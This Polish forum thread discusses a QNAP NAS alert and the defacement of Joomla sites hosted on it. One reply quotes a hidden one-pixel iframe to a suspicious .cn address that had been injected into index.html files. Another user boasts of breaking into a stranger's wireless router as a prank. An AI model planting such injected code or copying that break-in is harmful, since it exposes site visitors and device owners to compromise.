Pomoc Alrm przysłąny z Qnapa.?

Grzes978

Entry Technician
Q Associate
20 Maj 2008
72
1
8
45
Bielsko Biała
www.planetagor.pl
QNAP
TS-109/209 Pro
Ethernet
100 Mbps
Mam pytanko co oznacza taki alarm?

Dziękuję

Server Name: Qnap
IP Address: 192.168.1.200
Date/Time: 11/01/2008 16:59:05
Level: Warning
Re-launch process [thttpd].
 
Z jakiegoś powodu QNAP musiał zrestartować serwer WWW na którym stoi WebUI (strony administracyjne).
Czasami tak się zdarza. Jeśli nie masz tego zbyt często to raczej nie należy się przejmować. Nie było to związane przypadkiem (sprawdź czas) z 'bieganiem' po stronach admina?
 
hmnn

sądzę że w 99 procentach nie

zdarzyło się to mi tylko jeden raz

choć po Twoim poście jeszcze raz. zobaczymy czy dalej się będzie powtarzać
 
a to juz dosc powazna sprawa. mozesz to opisac? trzebaby skontaktowac sie z ludzmi z qnap'a na angielskim forum. Wielkrotnie zglaszano im braki w bezpieczenstwie - moze teraz by jakos zareagowali.
 
mogę opisać

tak wygladają dwie moje strony

www.komorowice.eu i www.alikom.komorowice.eu

zmieniony dostęp do Joomli na której zostały postawione strony, i na tym chyba koniec, pliki na serwerze chyba nieruszone, tzn. osobiste dane, itp, nie iwem czy coś nie było majstrowane w panelu administracyjnym, miłąem to samo hasło na głowna stronę i na Qnapa, hasło zmienione. :) musze jeszcze przejrzeć ustawienia.

generalnie tacy ludzie zazwyczaj tylko łądują swoje strony po to by pokazać że się włamali i że się ma słabe zabezpieczenia, plus zmieniają hasła tak dla jaj by utrudnić życie, generalnie dla psoty.

Sam kiedyś resetłem komuś router bezprzewodowy i zmieniłem dane plus zmiana hasła i następnie wysłąłem maila by sobie poustawiał clonowanie mac adresów.

Gościa kosztowało to 15 minut roboty i dodatkowo czegoś sie nauczył na przyszłość,a ja miałem satysfakcję :D że jestem mini hackerem

jakby ktoś miał jakies pytania chętnie napisze
 
witam i znów dzisiaj otzrymałem mały atak z tej samej strony i powiem ze już mi się to nudzi

p.s. czy wynika z tego ze do Qnapa tak łątwo się włamać, hasła mam dosć skomplikowane, wiec jestem w kropce bo nie wiem jaka moze być przyczyna.

jak ktoś jest ciekawy to prosze kliknac w ponizszy link komorowice.eu.

Silas moze ty masz jakieś pomysły jak to wywalić z qnapa, bo usuwać wszystko i wgrywac od nowa mi się nie chce.

Dzięki za podpowiedzi co do naprawy jak i bezpieczeństwa na przyszłość.
 
Może to problem z prawami dostępu do plików?

Ja jakiś czas temu też odkrylem, że we wszystkich plikach index.html znalazło sie coś takiego

<iframe src="http://bigtopescorts.cn/in.cgi?id1000" width=1 height=1 style="visibility: hidden"></iframe>

Wykasowalem to i po sprawie. Ale nadal nie mam pojęcia jak się to do mnie dostalo wow
 
ja myślę że jest to luka poprostu w cms'sie joomla a w takich "publikach" co rusz się pojawiają nowe luki. Wystarczy aktualizować joomle...
na 95% to nie jest wina QNAPA :) za bardzo prosty jest ten PA żeby były i tam jakieś luki a jeśli by były to baardzo mało i zostały dawno załatane przez ekspertów, którzy znają się na rzeczy(mówie tu tylko i wyłącznie o skrypty www Qnap'a) ;)
Jesli jest luka w jakimś oprogramowaniu "ZAINSTALOWANYM" na QNAPie to włamanie się poprzez nią może wywołać fatalne skutki bo dzięki temu atakujący ma dostęp do plików, bazy danych . A i to wystarczy by wgrać skrypt, który uruchomi daną aplikację, bądź pobierze np: hasła ;) - ale i przed tym da się uchronić xD
 
Chyba masz rację, a raczej na pewno, bo właśnie sobie przypomniałem że ta wersja Joomli to była 1.5.1, a wiem że miała dziury, miałem ją "zupdejtować" ale jakooś sie zeszło. :( no nic trudno, człowiek uczy się na błedach. dzięki